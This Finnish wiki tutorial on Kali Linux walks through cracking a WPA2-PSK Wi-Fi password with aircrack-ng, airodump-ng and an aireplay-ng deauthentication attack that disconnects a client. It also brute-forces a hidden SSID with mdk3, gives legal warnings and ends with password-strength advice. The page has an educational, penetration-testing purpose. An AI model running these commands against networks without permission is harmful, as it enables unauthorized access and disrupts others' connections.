Mainos / Advertisement:

Kali Linux

Kohteesta Taisto
Versio hetkellä 19. kesäkuuta 2016 kello 16.44 – tehnyt Minh (keskustelu | muokkaukset)
Siirry navigaatioon Siirry hakuun
Muut kielet:
English • ‎suomi

Kali Linux on Debianiin perustuva paketti, joka on tarkoitettu rikosteknisen tutkimiseen ja läpäisytesteihin.

Kali Linux sisältää esimerkiksi salasanan murto-ohjelman ja WLAN salauksen murtoon aircrack-ng.

Ohjeet ovat opetuskäyttöön.

Asennus

Lataa Kali Linux http://www.kali.org/downloads/, suosittelemme torrent -latausta, sillä paljon nopeampi kuin suoralataus.

Asentaminen on samankaltainen Debianin asennus

Paketit

Lista paketeista joita voit käyttää tietoturvan testauksessa. Ohjeiden ideoina on kuvastaa kuinka yksinkertaista on murtautua erilaisiin järjestelmiin ja se että pitää suojautua mahdollisimman hyvin.

HUOM! Omiin järjestelmiin murtautuminen sallittua. Luvattomat tietomurrot ovat Suomen laissa kiellettyjä!

Älä ole script kiddy

aircrack-ng

Tämä paketti on WLAN verkkojen murtamiseen. Testasimme tätä omassa verkossamme, eli emme ole käyttäneet luvattomasti toisen verkkoa.

Tämän voi asentaa myös Debianiin.

1. Avataan root terminaali

2. Määritetään langaton verkkokortti

 airmon-ng start wlan0

3. Tämä komento listaa kaikki lähialueen WLAN-verkot

 airodump-ng mon0

4. Keskitytään nyt tietylle tukiasemalle ja odotetaan että muodostaa yhteyden tukiasemalle.

 airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
  • bssid = MAC osoite tukiasemasta
  • write WPAcrack = Hakemistoon jonne kirjoitetaan -> Eli kotikansiosi juureen

5. Jätä nykyinen terminaali ikkuna taustalle ja avaa uusi terminaali ikkuna.

Tällä komennolla tapetaan MAC käyttäjän WLAN istuto (eli heitetään ulos WIFI:stä)

 aireplay-ng --deauth 100 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
  • --deauth 100 = Katkaise yhteys 100 kertaa
  • –a 00:14:BF:E0:E8:D5 = BSSID tukiasemasta
  • –c 4C:EB:42:59:DE:31 = BSSID asiakaslaitteesta

Jos virhe

 Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1
 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

aja komento (sammuta palvelu)

 /etc/init.d/network-manager stop

Pian tulostuu toiselle ikkunalle WPA handshake: 00:14:BF:E0:E8:D5

6. Aletaan siis se oikea murtaminen.

 aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [source/*.cap]

Esimerkiksi:

 aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
  • WPAcrack-01.cap = Tiedosto jossa on hash salasanasta
  • /usr/share/wordlist/* = polku salasana tiedostoon

Sitten vain odotetaan että hash on purettu.

Tulostuu KEY FOUND: [salasanasi]

SSID selville

Kuvitellaampa tilanne, jossa saat jostain langattoman tukiaseman josta et tiedä mitään. Haluaisit kuitenkin yhdistaa siihen, mutta et tiedä ssid. Ja tukiasemassa ei ole ketään yhteydessäkään

mdk3 wlan0 b -t 00:19:07:C4:8A:60

Nyt se bruteforcettaa ja koittaa selvittää kyseisen MAC-osoitteen omaavan tukiaseman SSID randomisti. Fiksua olisi toki käyttää sanalistaa, näin:

mdk3 wlan0 b -f /usr/share/wordlists/fasttrack.txt -t 00:19:07:C4:8A:60

Paranna WLAN verkkosi tietoturvaa

Salauksena ehdottomasti vähintään WPA2-PSK / WPA2-PERSONAL. Tämä kuitenkin on juuri ohjeemme mukaisesti murrettavissa.

  • käyttämällä pitkää, yli 8 merkkistä salasanaa
  • Isoja ja pieniä kirjaimia
  • erikoismerkkejä
  • numeroita
  • ei ole mikään sana tai lause


Lähteet

http://www.kali.org/

http://fi.wikipedia.org/wiki/Kali_Linux

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/

http://sarajarvi.org/tutoriaalit-wpa-murto/

Mainos / Advertisement: